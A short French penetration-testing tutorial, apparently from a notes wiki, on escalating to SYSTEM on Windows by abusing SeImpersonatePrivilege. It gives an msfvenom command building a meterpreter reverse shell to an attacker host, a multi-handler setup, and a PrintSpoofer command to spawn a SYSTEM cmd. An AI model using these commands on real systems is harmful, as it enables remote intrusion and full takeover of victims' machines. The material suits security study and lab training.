🎩SeImpersonatePrivilege
Abus des privilèges d'emprunt d'identité sur Windows 10 et Server 2019
Exploitation
Prérequis: La cible doit être vulnérable à une faille de type file upload pour pouvoir être exploité.
Maintenant que nous avons testé que nous pouvions télécharger un shell et exécuter des commandes, il est temps d'exploiter le système et d'obtenir un meterpreter sur la machine cible. Cela signifie que nous devrons créer une charge utile à l'aide de msfvenom ou de tout autre outil de votre choix. Nous nommons notre charge utile shell.exe.
$ msfvenom -p windows/meterpreter/reverse_tcp lhost=<attacker IP> lport=<port d'écoutee> -f exe > shell.exe
Il nous faut également préparer un multi handler sur notre machine pour recevoir la connexion.
La prochaine étape est d'uploader le reverse shell dans le server cible et de l'exécuter.
Une fois que le shell est bien reçu dans le multi handler, bien que vous n'ayez pas besoin de vous fier à la commande getprivs du shell Metepreter. Vous pouvez vérifier que le privilège activé peut être vérifié à l'aide de la commande whoami avec l'option /priv.
meterpreter> whoami /priv
On doit donc retrouver dans la réponse
SeImpersonatePrivilege en "Enabled" et le nom de l'utilisateur auquel on est connecté.
Elevation de privilège
Pour abuser de cette fonctionnalité on peut utiliser l'exécutable PrintSpoofer.exe.
C:\users\public>PrintSpoofer.exe -i -c cmd
Si tout se passe bien, cela devrait ouvrir un cmd avec les droits NT AUTHORITY\SYSTEM.
Dernière mise à jour